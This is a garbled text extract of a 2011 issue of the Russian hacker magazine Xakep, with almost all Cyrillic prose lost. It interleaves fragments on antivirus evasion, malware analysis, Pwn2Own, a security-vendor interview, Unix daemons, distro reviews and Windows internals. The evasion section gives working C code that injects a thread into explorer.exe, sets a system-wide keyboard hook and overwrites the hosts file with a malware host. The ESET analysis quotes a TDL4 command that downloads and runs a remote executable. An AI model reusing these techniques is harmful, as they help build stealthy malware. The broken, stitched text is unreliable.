,

AdjustTokenPrivileges. ? Comodo Avast
, .
.
, ,
.
, . ,
.
-:
076
UINT nReturnCode = 0;
HANDLE hExplorerProcess = 0,
hSnapshot = 0, hRemoteThread = 0;
PROCESSENTRY32W pe32 = {0};
UINT ExplorerID = 0;
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
pe32.dwSize = sizeof(PROCESSENTRY32);
Process32FirstW(hSnapshot, &pe32);
if(!lstrcmpiW(pe32.szExeFile, L"explorer.exe"))
ExplorerID = pe32.th32ProcessID;
else
{
for( ; nReturnCode = Process32NextW(hSnapshot, &pe32) ;)
{
if(!lstrcmpiW(pe32.szExeFile, L"iexplore.exe"))
{
ExplorerID = pe32.th32ProcessID;
break;
}
}
}
if(!ExplorerID)
return 0;
CloseHandle(hSnapshot);
hExplorerProcess = OpenProcess(PROCESS_ALL_ACCESS, 0,
ExplorerID);
PVOID pExplorerMemory = VirtualAllocEx(
hExplorerProcess, 0, 0x3000, MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
nReturnCode = WriteProcessMemory (hExplorerProcess,
pExplorerMemory, ThreadFunc, 0x1000 ,0);
hRemoteThread = CreateRemoteThread(hExplorerProcess, 0, 0,
(LPTHREAD_START_ROUTINE)
pExplorerMemory, &ExplorerID, 0, 0);
Process32First/Process32Next iexplore.exe. , ,
ID ,
VirtualAllocEx.
ThreadFunc:
static DWORD ThreadFunc(LPVOID lpThreadParameter)
{
return 0;
}
X 05 /148/ 2011
ClamAV . ,
, ,
Avast

, DLL .
LoadLibrary,
HookProc . API SetWindowsHookEx
. DLL . ?
Comodo. Avast,
,
.
.
: hosts
Avira AntiVir Personal Free Antivirus

CreateRemoteThread. ? : Avast Comodo , . AVG
, ,
. , Anti-Virus Free Edition , +/- .
, . ,
, , ,
.
, , , ,
.
:
HMODULE hDll = LoadLibraryW(L"DLL.dll");
PVOID pHookProc = (PVOID)GetProcAddress(hDll, "HookProc");
HHOOK hHook = SetWindowsHookExW(WH_KEYBOARD,
(HOOKPROC)pHookProc, hDll, 0);
DLL:
EXTERN_C __declspec(dllexport) DWORD HookProc(
int code, WPARAM wParam, LPARAM lParam)
{
return CallNextHookEx(0, code, wParam, lParam);
}
X 05 /148/ 2011
,
hosts,
IP-. , hosts:
HANDLE hFile = CreateFileW(
L"C:\\windows\\system32\\drivers\\etc\\hosts",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
HANDLE hMapping = CreateFileMappingW(hFile, 0,
PAGE_READWRITE, 0, 0, 0);
PVOID pHosts = MapViewOfFile(hMapping,
FILE_MAP_ALL_ACCESS, 0, 0, 0);
memcpy(pHosts, MalwareHost, lstrlenA(MalwareHost));
memcpy((char*)pHosts + lstrlenA(MalwareHost),
EndingBytes, sizeof(EndingBytes));
.
ReadFile/WriteFile,
MapViewOfFile, . Avast Comodo, ,
-, .

. , ?
, . ,
drive-by (xakep.ru/post/54161/default.asp)? ,
... z
077
MALWARE
, Senior malware researcher, ESET
. 1.
TRUE
-
URL
FALSE
3
SEO
BlackHat SEO
,
SEO
,
.
, , , .
,
.
Adware,
, , -
078
. , ,
, .
Win32/Patched.P
,
,
Win32/Patched.P (ESET).
X 05 /148/ 2011
3. WinSock
__in int flags
);
int recv(
__in SOCKET s,
__out char *buf,
__in int len,
__in int flags
);
int select(
__in
int nfds,
__inout fd_set *readfds,
__inout fd_set *writefds,
__inout fd_set *exceptfds,
__in
const struct timeval *timeout
);
. 2. -
2008 ,
, , .
Win32/Patched.P :
ws2_32.dll, (,
) MS Windows.
,
ws2_32.dll,
, ,
.
2 -,

, :
int WSASend(
__in SOCKET s,
__in LPWSABUF lpBuffers,
__in DWORD dwBufferCount,
__out LPDWORD lpNumberOfBytesSent,
__in DWORD dwFlags,
__in LPWSAOVERLAPPED lpOverlapped,
__in LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
);
int WSARecv(
__in
SOCKET s,
__inout LPWSABUF lpBuffers,
__in
DWORD dwBufferCount,
__out LPDWORD lpNumberOfBytesRecvd,
__inout LPDWORD lpFlags,
__in
LPWSAOVERLAPPED lpOverlapped,
__in
LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
);
int send(
__in SOCKET s,
__in const char *buf,
__in int len,
X 05 /148/ 2011
Winsock
, GET/POST
.
, .
, WSARecv(),
(. 3).
(. 1).
, , (. 5).
,
. ,
.
TDL4 Win32/Olmarik.AOV
, ,
TDL4 Win32/
Olmarik.AOV,
2011 . , ,

.
x64,
PatchGuard
64- . , -
. ,

Win32/Glupteba (ESET). ,
. ,
Win32/Glupteba TDL4 .
, TDL4
&C :
task_id = 2|10||hxxp://wheelcars.ru/no.exe
:
task_id = [command_id] [encryption_key] [URL]

DownloadAndExecute, ,
079
MALWARE
. 4. masterhost
http://mrjeep.info
(90.156.201.55)
http://juristmaster.ru
(90.156.201.100)
http://artvolley.info
(90.156.201.77)
http://antgreece.info
(90.156.201.41)
http://abadora.ru
(90.156.201.21)
90.156.201.0-90.156.201.255
Masterhost.ru
(Russian Federation)
http://wheelcars.ru
(90.156.201.12)
http://tehnologiya-materialov.ru
(90.156.201.81)
. 5.
,
, .
Win32/Glupteba C&C
(. . 7).
.
, .
. 7. Win32Glupteba
080
http://wolkintibet.net
(90.156.201.41)
http://avtoremontgaz.ru
(90.156.201.26)
http://kaskost.ru
(90.156.201.98)
. 6.
-,
. -, ,
Masterhost (. 4).
,
. Win32/Glupteba
,
,
. , .
Google AdWords,
,

.
TDL4 ,
, -
.
, Microsoft
Internet Explorer ActiveX- WebBrowser ( -
). ,
.
- . z
X 05 /148/ 2011

Mifrill (mifrill@real.xakep.ru)
Pwn2Own:
CanSesWest

.
BlackHat, HITB, , - . . .
, Pwn2Own
.
,
,
, , .
: Pwn
, Own :).

Pwn2Own , ,
CanSecWest (cansecwest.com).
, IT-,
: ,

. CanSecWest
,
,
IT- (Microsoft, Adobe, BlackBerry,
Intel ). , ,
. (, )
082
CanSecWest
,
. , ,
.
,
Pwn2Own ,
CanSecWest
2000-. ,
-
Pwn2Own
.
-
TippingPoint,
3Com, HewlettPackard.
,
Pwn2Own . ,

, ,

.
. , white
hat, , -
.
( ) Pwn2Own,
, $100 000 ( , ,
$100 000, $125 000),
$10 000 20 000. TippingPoint
. ,
,
,
.
TippingPoint Zero Day Initiative
(zerodayinitiative.com), Snosoft program (snosoft.blogspot.
com) iDefense Vulnerability Contributor
Program. Pwn2Own ZDI,
.
, TippingPoint ,

. ,
.
X 05 /148/ 2011
CanSecWest 2008
. , TippingPoint 2011
Pwn2Own , .
Pwn2Own 2011
X 05 /148/ 2011
, Pwn2Own
, .
, . , Pwn2Own
GeoHot ,
,
,
Pwn2Own. ,
,
- .
,
TippingPoint. 2011 .
, ? ,
:
,
. , ,
Pwn2Own ( ,
, tippingpoint.com).
. 30
, , . ,
, .
.
, ( ) -, Microsoft Internet Explorer, Apple
Safari, Mozilla Firefox Google Chrome. , Chrome
, 2009 2010 .
, , : Opera?.
083
Pwn2Own:

. Opera ZDI
. ,
.
64- OS X Windows 7,

,
.
IE, Safari Firefox
$15 000,
Chrome Google
.
, Google, $20
000 CR-48.
,
ZDI $10 000
, Google,
Google Chrome $10 000.
, ,
/, / .
2011 : Sony Vaio (Windows 7),
Alienware m11x (Windows 7), Apple MacBook
Air 13 (Mac OS X Snow Leopard) Google
CR-48 (ChromeOS), , .

.
:
Dell Venue Pro (Windows 7), iPhone 4 (iOS),
Blackberry Torch 9800 (Blackberry 6 OS)
Nexus S (Android).
$15 000.
Pwn2Own , , .
,

.

,
, TippingPoint
:
,
.
.
, ,
Pwn2Own, ,
Safari
.
, , ,
-
Vupen Safari
. Apple ,

, Safari 5.0.4 iOS 4.3.
,

Pwn2Own
,
, . Vupen,
, , , -

,
, .
-
Vupen BlackBerry Torch
085
X 05 /148/ 2011
Pwn2Own 2011,

,
, Vupen
Safari
-.
,
, ,
.
,
,
,
.
Internet Explorer 8,
64- Windows 7 SP1.
, Vupen,
Harmony Security

. , Vupen
, IE
Protected mode,
.
, ,
,
.
.
. , 32- IE.
Chrome . ,
2009 2010
, . ,
,
,
- . ,
.
Google
. , ,
,
Chrome html Java.

. ,
2010 iPhone 3GS
-
.
X 05 /148/ 2011
CanSecWest 2007

iPhone 4
BlackBerry Torch.
,

Independent Security
Evaluators. , Apple
,

.
iOS 4.2.1, iOS 4.3

ASLR. ,
:
ASLR, ,
$15 000 iPhone 4 .
, 2010
iPhone. - ,

BlackBerry 6.0.0.246.
BlackBerry
Torch 9800 - -
. RIM
ASLR, DEP ,

.
, , .
,

PlayStation3
Sony.
Dell Venue Windows Phone 7, -

.
, , , :
,
.
,
, Pwn2Own
-
. ,
, . z
085

c0n Difesa (condifesa@gmail.com, defec.ru)

1998 . .
,
, .

XSpider,
Positive Technologies.
. ,
, ,

IT-.
, .
; ,
;
,
, . , , .
,
1998
, .
XSpider Positive Technologies,
.
,
Positive Technologies:
086
( )
[]: Positive Technologies
?
MaxPatrol,
- ?
( Positive Technoloiges)
[]: , Positive Technologies
. ,
. :
PT Cleaning Services Inc.
. MaxPatrol, ,
. PT
, Positive Research,
.
,
, .
.
X 05 /148/ 2011
MaxPatrol , PT
DVD
dvd

100% Virus Free
Podcast,

,

HTTP://WWW
links
-
PT
PT
,
- ,
. ,
. .
?
, ?
[]:
( Positive Technologies)
[]: , -
,
.
X 05 /148/ 2011

-
Positive Technologies:
ptsecurity.ru;
: sgordey.blogspot.
com;
:
devteev.blogspot.com;

Positive Hack
Days: phdays.ru.
087
,
.
, ,

MaxPatrol.

,
,

.
[]: C 2008
MaxPatrol. ,
, .
-
. ?
[]: MaxPatrol, XSpider,
Enterprise. -
-

.
,
. , MaxPatrol ,

.
-
, XSpider
XSpider.
[]: MaxPatrol

.

(PCI DSS)?
[]: .
[]:

?
[]: ,

.
[]: -
,
,

?
[]: , -
.

Enterprise Security.

, -
PT

Google

.
[]:
,
?
[]: . (hh.ru/
employer/26624). , . ,
, ,
.
[]: PT -
, ,
?
[]: , .
XSpider MaxPatrol
088
X 05 /148/ 2011

, ...
[]: , , on-site ?
[]: ,

. , Wi-Fi . ,
.
[]: , , ?
[]: . , , .
?
[]: , .
.
[]: ?
,
:
, .
, ,
GRC (Governance, Risk, Compliance).
Positive Technologies Security Operational Center,
.
,
, - , ERP, ()
(). , (VOIP, PBX, 3G), /SCADA.
.
,

. , ,
, .
[]:
?
[]:
SCADA-. , .
[]: , -
-. , , ,
,
?
[]: , . , , , ERP SCADA.
,
.
[]: PT PCI DSS?
[]: , PCI DSS
, . 2008 Positive Technologies
PCI DSS QSA Associate, 2006
Web PCI DSS. PCI DSS ASV. MaxPatrol
QSA ASV .
[]: .
, ?
?
[]: ,
.
:) .
[]: 2010 Google . , , ,
. ( ,
) ?
[]: , , . ,
.
Google,
, SQL Injection . fun, . Positive Technologies .
Google, .
, MaxPatrol .
X 05 /148/ 2011

, 19 2011 Positive
Hack Days, Positive Technologies.

: -,
, .
, ,
,
-, .
,
.
. z
089
UNIXOID
(zobnin@gmail.com)
yd
rela
d
f sc
s ys t e m d
cyd
n
e
t
ula
systemd, ulatencyd, relayd fscd

UNIX. ,
, , , . ,
, .
systemd:
Linux- :
/sbin/init, , ,
. ,
,
: syslogd, cron, cups , . init
: getty xdm (kdm, gdm). ,
? ,
Windows Mac OS X . ,
090
, .
-,
, ,
,
.
Linux Ubuntu, . ,

(Gentoo Arch, !). -
,
.
X 05 /148/ 2011
HTTP://WWW
links
systemd
: freedesktop.
org/wiki/Software/
systemd;
freedesktop.org
systemd: cgit.
freedesktop.org/
systemd;
ulatencyd:
github.com/poelzi/
ulatencyd;
fscd:
people.freebsd.
org/~trhodes/fsc.
ulatencyd
pf + relayd:

# vi /etc/pf.conf
# WWW-
relayd
rdr on $int_if inet proto tcp from $lan to any \
port www tag INTWEB -> lo0 port 8080
#
pass in log on $int_if inet proto tcp from $lan\
to lo0 port 8080 flags S/SA synproxy state \
tagged INTWEB
# vi /etc/relayd.conf
http protocol "httpfilter" {
# TCP-
tcp { nodelay, sack, socket buffer 65536,
backlog 1000 }
#
label "BAD user agent"
request header filter "Mozilla/4.0*" from
"User-Agent"
#
label "BAD Host request"
request header filter "*youtube.com*" from
"Host"
request header filter "*facebook.com*" from
"Host"
#
request header change "Accept-Language"
to "ru-ru,ru;q=0.9"
...
, Red Hat
PulseAudio, .
systemd,
/sbin/init, , , ,
.
Systemd ,
. 99%
X 05 /148/ 2011
INFO
fscd
,
/sbin/
init .
,
(
, , ,
,
), .
,
,
, . , cron syslog,
; syslog ,

. -
,
. Systemd
, , , , .
. Systemd
,
(
, swap,
). ,
90% ,
systemd
, .
, systemd
.
, ,
: cron
syslog, /dev/log,
info

systemd
,
gnomesession kdeinit.
, systemd

,
fscd

.

.
systemd

, .

relayd hostated
( host state,
),

.
091
UNIXOID
Systemd
Fedora
. : freedesktop.
org/wiki/Software/systemd.
Systemd Ubuntu , :
d
f sc
$ sudo add-apt-repository ppa:andrew-edmunds/ppa

$ sudo apt-get update
$ sudo apt-get install systemd
/boot/grub/grub.cfg,
init=/sbin/systemd.
,
:
relayd
,
. ,
, A
B, C D, , A , . Systemd ,
,
,
. , .
, , cron syslog,
cron /dev/log
( , ),
, , , ,
, cron , .
cron
( ). (
) syslog, , , /dev/log,
- ( ),
. .
,
,
. , , CUPS ,
. ,
. Systemd ,
, ,

(
-).
,
Mac OS X , systemd
- .
, systemd Linux
:
cgroups
( , ,
umask, OOM killer, nice,
-,
).
, systemd
.
092
cyyd
n
e
t nc d
a
l
ulate
u
$ sudo systemctl units-list
, ,
status, start, stop enable.
ulatencyd:
, ,
? ?
? ?
, , ,
,
,
.

. ,
,
,
, , .
,

. ( BeOS),
( MS), , . Linux
Linux .
, Linux, ,
, .
, ,
.
.
CFS
(Completely Fair Scheduler), 2.6.23.
, Linux (
).
Linux
200- 2.6.38, bash. Linux
,
bash- .
: Linux ,
.
, Linux (
) ulatencyd,
,
.
X 05 /148/ 2011
ulatencyd ,

, ulatencyd cgroups
, .
, ,
- .
,
( , ), .
,
,
( ) ,
.
,
.
, (
),
, .
ulatencyd,
https://github.com/poelzi/ulatencyd
cmake make:
$ cmake
$ make
$ sudo make install
:
$ sudo /usr/local/sbin/ulatencyd -v 2
X 05 /148/ 2011
, :
$ ps xaf -eo pid,session,args,cgroup
.

,
, .
relayd:
,
-? ?
, . ,

? ? .
, ,
DNS-. ? -, DNS-
( DNS-).

BIND ( ). ,
DNS-. ,

( ). -,
DNS- .
, ,
( ?). , -
093
UNIXOID
systemd ( After),
syslog
.
SMTP?
? ,
- ,
.
relayd, OpenBSD 4.3,
, ,
.

3, 4 7, 7 ()
( ).
relayd ,
- SSL-
web-

web-.
,
50 .
, , .
, ,
:
# vi /etc/relayd.conf
###
#
relayd_addr="127.0.0.1"
relayd_port="8053"
# DNS-,
#
table <dns_servers> { 192.168.1.1, 192.168.1.2,
192.168.1.3 }
094
###
#
# (10 )
interval 10
# TCP
# ( 200 )
timeout 200
# 5
#
prefork 5
#
log updates
### DNS-
#
dns protocol "dnsfilter" {
tcp { nodelay, sack, socket buffer 1024, backlog 1000 }
}
###
relay dnsproxy {
#
listen on $relayd_addr port $relayd_port
#
protocol "dnsfilter"
# DNS-
# DNS-,
forward to <dns_servers> port 53 \
X 05 /148/ 2011
systemctl
mode loadbalance check tcp
}
dns protocol relay.

, ,
(relayd : HTTP,
DNS TCP). ,
, ,
,
. DNS-
(
TCP-, relayd
, ping SSL). , DNS-
, relayd ,
( interval) .

relayd:
# relayd -d -vv -f /etc/relayd.conf

.
.
relayd_flags= /etc/rc.conf.local.
FreeBSD fscd:
. fscd ,
. , ,

UNIX. FreeBSD .
X 05 /148/ 2011

( , ).
, .
, ?
. ? ,
(
). , , Solaris , , , .
FreeBSD . , FreeBSD, .
, fscd ,
, man- ,
. , fscd , , sshd, :
# fscadm enable sshd /var/run/sshd.pid
, fscd . :

/etc/rc.d ( /usr/local/etc/rc.d) /etc/
rc.conf, ( ).
fscd FreeBSD 9.0, (people.freebsd.
org/~trhodes/fsc) .
UNIX - ,
- .

UNIX, ,
. ,
UNIX, grep
syslog. z
095
UNIXOID
Adept (adeptg@gmail.com)

,
, .
. , OpenSource
-.

, Debian 6 ( Squeeze).
. , Debian
: x86 x86-64,
ARM (armel)
powerpc ia64 (Intel Itanium), sparc (Oracle
SPARC), mips s390 (IBM S/390).
alpha hppa (HP PA-RISC).

096
FreeBSD: Debian GNU/kFreeBSD (kfreebsd-i386 kfreebsd-amd64).

FreeBSD 8.1.
: apt-get, ipfw ( pf) jail.
Debian 29 000 ( 15 000 ).
8 DVD 52 CD. , -
LiveCD ( x86 x86-64). Live- (
)
, :
X 05 /148/ 2011
, Debian Linux? Debian

GNU/kFreeBSD :)
Kit
ConsoleKit ,
.

.
ConsoleKit ,
. ConsoleKit
.
Seat
/
( , Seat
++).
login manager,
,
Seat. , ,
$XDG_SESSION_COOKIE. ConsoleKit

.
:
$ ck-list-sessions
PolicyKit
,

.
,
PolicyKit.
,
,
root. PolicyKit sudo (,
, ) ,
,
. ,
, :
$ pkaction
ConsoleKit PolicyKit D-Bus.
# cat debian-live-6.0.0-i386-standard.iso \
> /dev/sdb

live-build,
LiveCD/LiveUSB.
(
Lenny) :
1.
X 05 /148/ 2011
Fedora Gnome3
ext4 (
ext3) ZFS ( Debian GNU/
kFreeBSD), reiserfs (
partman-reiserfs ).
2.
.
3.
SSH-.
:)
4.
firmware.

,
.
5. ( GRUB2)
Windows.
:
1. .
insserv,
( ).
2. KMS (Kernel Mode Setting
) Intel,
AMD, Nvidia. KMS
,
suspend/resume.
3. <Ctrl+Alt+Backspace>, ,
.
4. IPv6,
. IPv4 .
HTTP://WWW
links
Debian LiveCD:
live.debian.net;

ConsoleKit:
goo.gl/duKxN;

PolicyKit:
hal.freedesktop.org/
docs/polkit.

openSUSE 11.4. :
/
libzypp,
, ;
systemd ( );
OpenOffice LibreOffice;
WebYaST web- ;
HAL (Hardware Abstraction Layer) ;
Linux- 2.6.37;
DE: Gnome 2.32.2 ( Gnome3,
), KDE 4.6, Xfce 4.8;
: XOrg 7.6, Mesa 7.9, Python 2.7, Qt 4.7;
: Firefox 4, VirtualBox 4.
097
UNIXOID
Unity Launcher

Mandriva-2011.
.
:
RPM5 ( RedHat);
systemd;
,
;
;

, ,
, ;
Linux- 2.6.37;
DE: KDE 4.6 DE , Gnome 2.32, Xfce 4.8;
: XOrg 7.5, GCC 4.5;
: Firefox 4, openoffice 3.3.
5. OSS . , ,
.
6.
/etc/default/keyboard.
7. DE: KDE SC 4.4.5, GNOME 2.30 ( 2.32), Xfce 4.6, LXDE 0.5.0.
8. : OpenOffice.org 3.2.1,
Iceweasel (Firefox) 3.5.16.

:
1. Linux 2.6.32 Xen 4.0.1 (dom0 domU).
2. : GCC 4.4.5, X.Org 7.5.
3. : OpenSSH 5.5p1, Apache 2.2.16, MySQL
5.1.49, PostgreSQL 8.4.6, Samba 3.5.6.
4. : Python 2.6.6 (3.1.3 ),
Perl 5.10.1, PHP 5.3.3, Ruby 1.9.1.
5. glibc eglibc (Embedded GLIBC, ),
, glibc.
6. LDAP ( libnss-ldapd, libpam-ldapd nslcd).
7.
DebSrc 3.0,
(
).
8. dpkg. XZ
( LZMA2). dpkg perl.
9. ConsoleKit PolicyKit (.
Kit ).
10. DNSSEC (
098
, KDE
DNS-) DNS-
BIND9. OpenDNSSEC
DNSSEC- .
Debian - :
1. Debian Backports (
)
backports.debian.org.
2. Debian Squeeze debian.org, 13 (!) .
: packages.debian.org, wiki.
debian.org . , , ,
, : replay.waybackmachine.org/20100830160456/http://
www.debian.org.
Debian . ,
.

non-free.
Debian, Ubuntu
- .
11.04 ( Natty Narwhal) 28
. 10.04 10.10
,
.
Unity (
). Unity : ,
. , .
Unity
GlobalMenu,
. ,
, , .
,
, .
Unity Launcher. ,
, : Win ( Super).
Unity Dash,
Ubuntu . , Dash / , /
, , .
, Unity, . ,
, /, Compiz. Compiz, Unity
X 05 /148/ 2011
Software Center

gentoo Calculate Linux 11.0.
, .
:
Calculate Scratch Server;
Calculate Linux Desktop
Calculate Directory Server rolling-release;

;
Calculate Linux Desktop;
Portage 2.2;
Canon;
KMS Intel.
Clutter (
OpenGL ) Zeitgeist (
/
).
Unity
, - .
15,6" 2.
. ,
. ,
Unity Fedora
OpenSUSE .
Compiz, D-Bus , Unity.
, Unity .
- Unity , gdm Ubuntu
Classic Gnome ( Gnome Shell).
Unity , , :
1. armel
( OMAP3 OMAP4). x86
. , ARM . Canonical :)
2. Banshee.
, mono, mono . .
, Banshee , GNOME Foundation. Canonical ,
Canonical :).
, Banshee Ubuntu
, 25% GNOME Foundation.
3. LibreOffice 3.3 OpenOffice.
X 05 /148/ 2011
Debian
4. Software Center .
5. Ubuntu One Shotwell.
6. Shotwell 0.8 ( , YouTube,
Flickr, Facebook, PicasaWeb .).
7. Linux 2.6.38.
8. : GCC 4.5, X.Org 7.6.
9. DE: KDE 4.6, Gnome 3, Xfce 4.8, LXDE 0.5.0.
10. , , ,
Wayland.
RPM-based
Red Hat Enterprise Linux 6,
2020 .
:
1. Linux 2.6.32 ,
.
RHEL6,
. ABI- .

CFS (Complete Fair Scheduler). , ( / ). ,
2-5 .
2. SySV init upstart.
3. KVM,
.
Xen Dom0 , Xen DomU (
). SPICE (Simple
Protocol for Independent Computing Environments),
.
SPICE VNC (Virtual Network Computing) RDP
(Microsoft Remote Desktop Protocol) - ,
. , ,
;
4.
PCI Express.
5. ext4.
XFS, NFSv4
Btrfs.
6. System Security Services Daemon (SSSD) - . LDAP, Kerberos .
: (offline mode).
7. , , ,
.
099
UNIXOID
Ubuntu One
,
.
8. : GCC 4.4, X.Org 7.5.
9. DE: KDE 4.3.4, Gnome 2.28.6.
10. : Apache 2.2.15, MySQL 5.1.47,
PostgreSQL 8.4.4, Samba 3.5.4.
11. : PHP 5.3.2, Python 2.6.5.
RHEL .
CentOS. CentOS 6
, -. ,
. OSS-
Scientific Linux 6 (scientificlinux.org).
. CERN ( ,
) .
RHEL 6:
IceWM;
OpenAFS ;
revisor, livecd-tools liveusb-creator LiveCD/LiveUSB;
yum-autoupdate .
,
Scientific Linux, . Oracle , RHEL 6, Oracle Linux 6. RHEL . Unbreakable
Enterprise Kernel ( 64- ),
, , Oracle, :).
100
RedHat Fedora. 15 (Lovelock).

Fedora 15 :
1. systemd
( ).
2. LZMA LiveCD.
3. /var/run /var/lock RAM-
(tmpfs).
4. Btrfs .
5. suid- capabilities.
6. OpenOffice.org LibreOffice.
7. RPM 4.9.
8. Spice virt-manager.
9. 4 .
10. D-Bus,
.
11. DNS- DNSSEC.
12. :
:
em{port} ;
pci{slot}#{port} PCI-. VLAN alias : .{vlan} :{alias}.
13. : GCC 4.6, X.Org 7.6.
14. DE: KDE 4.6, Gnome 3.0, Xfce 4.8.
,
. ( 8.1)
FreeBSD 8.2 7.4. 7.4 -
X 05 /148/ 2011
eth0, em1
: , ( : Atheros AR8151/
AR8152, Broadcom BCM5718, SiS190/191 ).
.
FreeBSD 8.2 :
1. ZFS 15 , OpenSolaris , ZFS.
2. geli
,
. AES-XTS,
geli .
3. netgraph-, .
4. , USB 3.0 (xhci).
5.
CPU Intel.
6. (Atheros AR8151/AR8152
PCIe Gigabit/Fast Ethernet, Intel 10Gb Ethernet 82599 Broadcom
BCM5718) (Intel Wireless WiFi Link 6000, Broadcom
BCM430* BCM431*) .
7. DTrace , .
8. tar LZMA.
9. FreeBSD x86-64
Xen HVM.
X 05 /148/ 2011
10. pxeboot NFSv3 (

NFSv2).
11. : 1 , 4 /var 1 /tmp.
12. GNOME 2.32.1, KDE 4.5.5.
changelog :
1. ,
- , (,
upstart systemd).
2. , HAL.
3. D-Bus (.
][ 2010 ,
xakep.ru/post/54722/default.asp).
4.
LibreOffice. , Debian
.
5. ext4.
- , , btrfs.
6. , Wayland XOrg. z
101
UNIXOID
iv (ivinside.blogspot.com)
WINDOWS
Linux

.
. ,
:
.
Autorun.inf ,
.autorun!
, , Windows
usb-
.
autorun.inf,
,
. , Windows 7, . .
102
( Stuxnet) ,
.
, .
freedesktop.org,
, GNOME KDE, : .autorun, autorun
autorun.sh. , .
.autorun, , .
X 05 /148/ 2011
40 960 evince-thumbnailer

libc

Ubuntu
1. AppArmor Linux,

.
,
. Ubuntu

AppArmor.
apparmor-profiles.
/usr/share/doc/apparmor-profiles/extras,
/etc/apparmor.d.
2. ASLR (Address Space Layout Randomization)
.
ELF
, ,
. /proc/sys/kernel/
randomize_va_space (1
2) (0) ASLR. 2005 (
2.6.12) Linux
ASLR. (PaX, ExecShield
)
ASLR. , Hardened, Ubuntu
.
3. PIE (Position Independent Executables)
-fPIE pie.

ASLR
.
32- ,
( 10%).
4. NX (No eXecute Bit)
, ,

.
:
,
( Intel Pentium 4 6xx AMD Athlon 64);
PAE x86-64 (

).
, autorun.inf Windows,
.
,
,
. , (,
X 05 /148/ 2011
Evince
pdf) .
.autoopen autoopen

, , . , Nautilus
(?) .

.
?
.
,
, . (
) :
USB, eSATA, FireWire, PCMCIA;
(ext3, ext4
);

(ntfs-3g);
(
).
.
, 2009 VoIP
Auerswald (CVE-2009-4067).
USB- .

.
USB-
, QEMU
USB-. 2009
ext4,
ext4_decode_error(),
NULL-
.

, .
,
.
( FUSE)
, .
HTTP://WWW
links
,
-

:
goo.gl/2wIIA;
,

: cve.mitre.org/
cve/cve.html;

: youtube.
com/watch?v=
ovfYBa1EHm4;

, Ubuntu:
wiki.ubuntu.com/
Security/Features.
DVD
dvd

DVD

ShmooCon 2011,
, ,

.
103
UNIXOID
Nautilus ,

? :
1. . , .
2. (lint, clang static analyzer ).
3. . ( )
. , , , ,
,
. , , ( smart fuzzing).
,
.
! Nautilus
, ,
. GdkPixBuf,
,
libpng, libtiff, libjpeg. . 2011
libpng < 1.5.0 (CVE-2011-0408),
png_do_expand_palette() png_do_rgb_to_gray(). pngrtran.c. PNG-, MNG- JNG-

,

ShmooCon. , PoC-
,
1.5.1. 2010 LibTIFF 3.x, TIFF-
SubjectDistance.
3.9.4. FreeType < 2.4.3,

TrueType GX. ft_var_readpackedpoints().

, Linux .

:
evince-thumbnailer pdf;
totem-video-thumbnailer - ;
gnome-thumbnail-font .
, evincethumbnailer :
Adobe Acrobat Reader
Evince PDF-.
, PostScript, TIFF, DVI, DjVu.
GNOME.
Common Vulnerabilities and Exposures, ,
Evince ,
2010 . (CVE2010-2640) ,
, .
Ubuntu
10.10 (
kill.sh
killall gnome-screensaver).
DVI-.
,
(/media/NNN). ,
, Nautilus
.
Nautilus
GNOME Nautilus , Ubuntu, GNOME.

freedesktop.org USB-
.
, Nautilus GVFS , . /media/
NNN, NNN . Nautilus
-
104
$ evince-thumbnailer -s 100 /home/user/doc.pdf \

/home/user/thumb.png
'-s' , PDF-,
. Nautilus
X 05 /148/ 2011

.
:
$ gconftool -R /desktop/gnome/thumbnailers
, :
. ,
AppArmor Ubuntu 10.10, totem-videothumbnailer gnome-thumbnail-font. ,
Ubuntu . ,
, ,
, . Ubuntu
,
. , .
Ubuntu :
AppArmor, ASLR, PIE, NX-.
,
(ret2lib) - (ROP).
ShmooCon 2011 ASLR/PIE
32- Linux. ,
libc ( ), , 3 000 , .
,
( ,
). , , pdf-,
evince-thumbnailer. ,
Nautilus evincethumbnailer.
AppArmor ,
, /etc/apparmor.d.
, Ubuntu 10.10 evince-thumbnailer
~/.config/autostart ,
(
) . AppArmor ,
X 05 /148/ 2011
Nautilus
:
X11 ( );
, ,
.
,
, :
1. . Linux
, Windows, .
.
2. (
) Nautilus .
Nautilus Edit -> Preferences -> Media
Browse media when inserted.
3. .
Nautilus, . Nautilus
Edit Preferences Preview.
4. AppArmor ,
.
Skype, , .
5. PaX,
,
. PaX ASLR,
.
6. 64- , ASLR ,
. , 64
,
x86-64 .
7. Ubuntu (
), ,
, , .
, Linux , ,
Ubuntu. ,
:
- Linux
Windows. z
105
CODING
(stannic.man@gmail.com)

? , ,
.
. ,

.
Windows (-, , , , cmd.exe,

) , ?
: Windows , .
( , )
MS-DOS
Windows. , .
CSRSS, ][ Windows.
, -
106
, .
,
.
Windows
, , ( ), , LPC/RPC, COM, -.
- ,
( ru.wikipedia.org/wiki/_). , ,
X 05 /148/ 2011
,
.
CSRSS.

? , . ,
API- AllocConsole. (
) AttachConsole
.
: - ,
csrss.exe. , ,
, ,
() . SetConsoleCursorInfo, SetConsoleCursorPosition,
SetConsoleTitle ( Get-).

, csrss.exe
. ? ( )
65535 ,

. ,
,
,
CSRSS
. ,
.
CTRL+C
?
,
CTRL+C,
?
CTRL+ . CTRL_C_EVENT,
CTRL+C.
CTRL_BREAK_EVENT, . CTRL_CLOSE_EVENT, , ,
. CTRL_LOGOFF_EVENT
, .
, CTRL_SHUTDOWN_EVENT, ,
.

API GenerateConsoleCtrlEvent.
,
CTRL-, ,
- . kernel32.
dll!SetConsoleCtrlHandler,
CTRL-.
.

.
?
, ,
,
? ,
, ,
, ,
X 05 /148/ 2011

AllocConsole. winsrv!SrvAllocConsole. ,
,
kernel32!CtrlRoutine
kernel32!PropRoutine (
CsrClientCallServer
0x20224).
- CTRL- CSRSS
(!)
: winsrv!ProcessCtrlEvents
winsrv!CreateCtrlThread winsrv!InternalCreateCallba
ckThread kernel32!CreateRemoteThread.
CtrlRoutine.
, CSRSS ,
,

.

CreateThread(Ex).
,
: ,
, Ctrl+C Ctrl+Break,
. API-

.

CSRSS,
CreateThread(Ex).

:
HTTP://WWW
links

MSDN:
http://goo.gl/bTwhz.
